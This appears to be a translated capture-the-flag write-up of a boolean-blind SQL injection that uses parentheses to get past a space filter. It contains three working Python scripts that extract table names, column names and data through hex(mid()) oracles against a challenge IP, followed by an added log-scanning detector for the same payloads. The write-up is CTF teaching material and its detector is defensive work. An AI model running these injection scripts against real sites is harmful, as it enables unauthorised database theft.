Since I'm still pretty green, it took me a long time to piece together the payload for this challenge, so I'm recording it here.
The URL given: http://119.23.73.3:5004/
After opening it, we append ?id=1 to the URL and get: (screenshot)
When our input is wrong, the page no longer echoes anything.
So we learn that when the injected condition is true, the page echoes "Hello".
Trying a bit more, we find that spaces, sub, > and a few other things are banned. But other basic keywords such as "ascii", "hex" and "select" are not banned. So we need another way to separate tokens instead of spaces; here we use parentheses () in place of every space (since sub is banned, substr() is out too, which is why mid() is used below).
The payloads are in the code below; just read through them.
Here is the Python code.
① This one dumps the table name
import requests
import string

# Probe used to check the database-name length; kept from the original script, not used further below
urll = "http://119.23.73.3:5004/?id=1'and(length(database()))='1"
f1 = requests.get(urll)
content = f1.content
s = string.printable   # candidate characters, tried one by one for each position
# for i in range(10):
#     url = "http://119.23.73.3:5004/?id=1'and(length(database()))='" + str(i)
#     f = requests.get(url)
#     if f.content != content:
#         print(f.content)
#         print(i)
url = "http://119.23.73.3:5004/?id=1"

def getData(url):
    r = requests.get(url)
    return r.text

def getTables():
    tables = ''
    for i in range(50):               # position inside group_concat(table_name)
        for j in s:
            # every space is replaced by parentheses; the extracted character is compared as hex
            # (MySQL hex() returns uppercase, but the default collations compare case-insensitively)
            url2 = url + "'and(select(hex(mid(group_concat(table_name)," + str(i + 1) + ",1)))from(information_schema.tables)where(table_schema=database()))='" + j.encode().hex()
            #text = getData(url2)
            f = requests.get(url2)
            text = f.text
            if 'Hello' in text:       # "Hello" is echoed only when the condition is true
                tables += j
                #print(j)
                #print(tables)
                break
    print(tables)

getTables()
We get: (screenshot)
② Next, the column names
import requests
import string

# Same length probe as above; kept from the original script, not used further below
urll = "http://119.23.73.3:5004/?id=1'and(length(database()))='1"
f1 = requests.get(urll)
content = f1.content
s = string.printable   # candidate characters, tried one by one for each position
# for i in range(10):
#     url = "http://119.23.73.3:5004/?id=1'and(length(database()))='" + str(i)
#     f = requests.get(url)
#     if f.content != content:
#         print(f.content)
#         print(i)
url = "http://119.23.73.3:5004/?id=1"

def getColumn():
    Column = ''
    for i in range(50):               # position inside group_concat(column_name)
        for j in s:
            # restrict to the table found in step ①; again no spaces, only parentheses
            url2 = url + "'and(select(hex(mid(group_concat(Column_name)," + str(i + 1) + ",1)))from(information_schema.columns)where(table_schema=database()and(table_name='do_y0u_l1ke_long_t4ble_name')))='" + j.encode().hex()
            #text = getData(url2)
            f = requests.get(url2)
            text = f.text
            if 'Hello' in text:       # "Hello" is echoed only when the condition is true
                Column += j
                #print(j)
                #print(Column)
                break
    print(Column)

getColumn()
Result: (screenshot)
③ Dump the data
import requests
import string

s = string.printable   # candidate characters, tried one by one for each position
url = "http://119.23.73.3:5004/?id=1"

def getContent():
    content = ''
    for i in range(50):               # position inside group_concat(<column>)
        for j in s:
            # read the column found in step ② directly from the table found in step ①
            url2 = url + "'and(select(hex(mid(group_concat(d0_you_als0_l1ke_very_long_column_name)," + str(i + 1) + ",1)))from(do_y0u_l1ke_long_t4ble_name))='" + j.encode().hex()
            #text = getData(url2)
            f = requests.get(url2)
            text = f.text
            if 'Hello' in text:       # "Hello" is echoed only when the condition is true
                content += j
                #print(j)
                #print(content)
                break
    print(content)

getContent()
It dumps straight out.
When you work through this challenge, pay close attention to how url2 is built; because every space is replaced by (), I kept losing track of what was inside. Be careful when writing it.
Also, the final value can be compared as hex or as ascii.
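From the other side of the fence: the request shape used throughout this writeup (SQL keywords glued directly to an opening parenthesis because spaces are filtered, plus hex()/mid() single-character oracles and information_schema lookups) is easy to spot in access logs. The following detector is an added example, not code from the original post; the log lines it scans are constructed samples modelled on the payloads above, and the function and pattern names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original post), modelled on the
# request shape this writeup uses: no spaces, parentheses as separators, hex comparison.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1'and(length(database()))='1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1'and(select(hex(mid(group_concat(table_name),1,1)))from(information_schema.tables)where(table_schema=database()))='64 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1'and(select(hex(mid(group_concat(table_name),1,1)))from(information_schema.tables)where(table_schema=database()))='65 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=2&page=3 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# SQL keyword glued to "(" : the fingerprint of a payload that replaced every space
GLUED_KEYWORD = re.compile(r"\b(and|or|select|from|where|union)\(", re.I)
# Functions that leak one character per request in a boolean-based blind attack
CHAR_ORACLE = re.compile(r"\b(hex|ascii|ord|mid|substr|substring)\(", re.I)


def inspect_value(value):
    """Return the reasons a single (already URL-decoded) query value looks like blind SQLi."""
    reasons = []
    if GLUED_KEYWORD.search(value):
        reasons.append("keyword(")        # e.g. and( / select( / from(
    if CHAR_ORACLE.search(value):
        reasons.append("char-oracle")     # hex(mid(...)) style extraction
    if "information_schema" in value.lower():
        reasons.append("schema-enum")
    return reasons


def scan_log(text):
    """Return (ip, param, reasons) for every request whose query values look like blind SQLi."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # decodes %xx
        for name, values in params.items():
            for val in values:
                reasons = inspect_value(val)
                if reasons:
                    hits.append((ip, name, reasons))
    return hits


def suspicious_sources(hits, threshold=2):
    """IPs with at least `threshold` flagged requests: the one-character-per-request loop above."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

Run it as `suspicious_sources(scan_log(SAMPLE_LOG))`; a real deployment would feed it the live access log and alert on any source that keeps hitting the same parameter with a changing hex suffix.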